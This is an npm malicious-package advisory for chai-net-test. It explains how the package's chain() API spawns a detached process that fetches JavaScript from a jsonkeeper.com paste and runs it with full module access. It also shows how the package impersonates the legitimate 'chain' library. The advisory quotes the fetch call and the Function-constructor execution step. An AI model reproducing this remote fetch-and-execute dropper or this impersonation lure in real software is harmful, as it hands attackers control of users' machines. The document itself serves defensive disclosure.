npm · Malicious package advisory
Malwarechai-net-test
MAL-2026-5607
Malicious code in chai-net-test (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cd5f4bb3d7abae3be57c7521b84016b6484d4c21bd2898fcde043d376513cf1e)
chai-net-test ships a remote-code-execution dropper behind its public `chain()` API. When a consumer calls `chain([...])` (the documented entry point), src/index.js spawns src/utils/swap.js as a detached child Node process. swap.js performs `axios.get('https://www.jsonkeeper.com/b/5IZTJ')`, takes the response's `.Cookie` string, builds a function via `new Function.constructor('require', s)`, and invokes it with the package's `require` — granting the attacker-supplied JavaScript full Node module access on the consumer's machine. The destination is jsonkeeper.com, a public anonymous JSON paste host whose contents are fully mutable by whoever holds the paste id, so the executed bytes can change at any moment without any package republish. The package additionally impersonates the legitimate stream-chaining library `chain` by uhop: the README claims to be a 'lightweight, no-dependencies micro-package' and links to uhop's wiki, while package.json declares runtime dependencies on axios and sqlite3 — a cover-story to lure consumers of the real library into invoking the trojaned API.
Compromised versions (3)
- 1.1.0
- 1.1.2
- 1.1.3
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.